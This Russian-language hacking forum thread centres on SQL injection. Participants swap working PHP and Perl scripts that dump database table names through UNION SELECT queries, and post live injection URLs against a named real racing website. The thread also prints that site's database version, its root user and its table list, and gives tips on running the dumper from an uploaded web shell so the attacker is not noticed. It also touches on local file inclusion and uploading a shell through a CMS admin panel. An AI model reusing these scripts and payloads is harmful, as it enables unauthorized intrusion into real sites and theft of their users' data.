помогите ребята с скуль иньекцией. Если ввожу адрес: то вылазит ошибка: а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться? и ещё вопрос: если есть локальный инклуд, но фильтруются .. (две подряд идущие точки), то можно ли воспользоваться этим инклудом, если необходимо подняться на несколько уровней вверх?
Здравствуйте! Подскажите, как залить шелл на сервер, если есть логин и пароль администратора DataLife Engine (апдейт конца 2007 года)? Спасибо!
Может кто подскажет, видно что есть sql инжект. все подходит , но начинаю подбирать поля, и бесплоезно сколько бы не ставил там 1,2...30/* и все равно The used SELECT statements have a different number of columns, и что делать мож кто подскажет?
банальный дампер на пхп или перл, учти что в логах будет много какашек скрипт: PHP: <?php set_time_limit(0); ignore_user_abort(true); $s=1; $f=39913; $fph = fopen ("result.txt", 'a+'); for ($i=$s; $i<=$f; $i++) { $aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a)+from+information_schema.tables+limit+".$i.",1/*"); $res=null; $pattern ="/:::(.+):::/"; preg_match_all($pattern, $aps, $out); $res=array_values(array_unique($out[0])); fputs ($fph, $res[0]."\r\n"); sleep (5); } fclose ($fph); ?> Писать не хрень, а запрос мб?
Попробуй перебирать с помощью ORDER BY. Почитай об этом тут http://forum.antichat.ru/thread43966.html. А еще там может быть два запроса с разным количеством полей. В этом варианте посимвольный брут.
ордер бай не пашет, вроде http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/* посмотрите кто нить как там
Пашет, попробуй так http://atv.worcsracing.com/tracks.php?ID=-1+order+by+26/* и так http://atv.worcsracing.com/tracks.php?ID=-1+order+by+25/* http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1,1,1,1/* 4.0.21-nt/worcsatv/root@localhost
Полчаса назад писал для себя: PHP: #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; $x=0; $y = $ARGV[0]; open(TT,">","mda.txt") or die "$!"; while ($x<=$y) { $omfg = $ua->get("СКУЕЛЬ")->content; $omfg =~m%:::(.*?):::%i) $table = $1; print TT $table, "\n"; $x++; } close TT; В get("СКУЕЛЬ") должна быть скуль вида: http://site.com/index.php?id=1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a)+from+information_schema.tables+limit+$x,1/* Участки выделенные красным обязательны в запросе. Запускаешь скрипт, вводишь кол-во таблиц/полей/ещё чего то, которое нужно сдампить. Всё сохраняет в текстовик mda.txt ЗЫ Писалось на скорую руку для себя, так что любители дое*аться к коду идут лесом
.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить
устанавливаешь perl-интерпретатор. Потом пуск-> выполнить-> cmd-> <путь к интерпретатору>/perl.exe <путь к скрипту>/script.pl
Или так как написал Afost, или одно из двух Если большая база (мне пришлось 1к. дампить), то что бы не спалиться дико, запускай с шелла. Заливай файл с расширением .pl на сервер, и запускаешь такой командой: perl blablabla.pl 400 где 400 - нужное кол-во записей для сохранения. Скорей всего тебя скинет с шелла, т.к. скорость работы скрипта невысокая (будет тайм-аут), то ждёшь энное время и заходишь заново в папку , там уже должен лежать файл mda.txt . Если его размер 0 байт, то ждёшь ещё= ) Если всё таки хочешь запускать со своего компа, то ставишь актив перл и в cmd пишешь blablabla.pl 400
Aга, спасибо. Но вы уж простите, не могу отблагодарить плюсиком А вот этот шелл он должен быть получается на локальном хосте?
Нет, как раз с локалхоста ты можешь запустить через консоль(цмд). Шелл должен быть на любом стороннем серванте.
Как делал я. 1)Писал подобный скрипт но на пхп. 2)заливал на хост и ставил диапазон 1..1000(например) 3)запускал 4)скрипт через некоторое время переставал работать, я смотрел на конечную запись и дописывал в скрипт нужный диапазон (например 439..1000)
Я же написал, что если база небольшая, то можешь и с локалхоста запускать. Если база большая, то запускай с шелла (если он у тебя есть)
Таблицы: Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS OLD_gathering OLD_logos bademails chronjobs chronjobs_old david email_settings forum gathering jobs jobs_categories jobs_education jobs_education_bu jobs_focus jobs_languages jobs_my jobs_my_search jobs_states keywords logos may2206 my_users my_users32106 my_users_BACKUP_6_25_07 my_users_basic my_users_bu my_users_bu_jul_9_2007 noa_phone phonebank_settings privs queries tbl temp103021435 to_import transactions update06_25_2007 user_groups web_navigation web_pages web_pages_BACKUP Дальше сам.
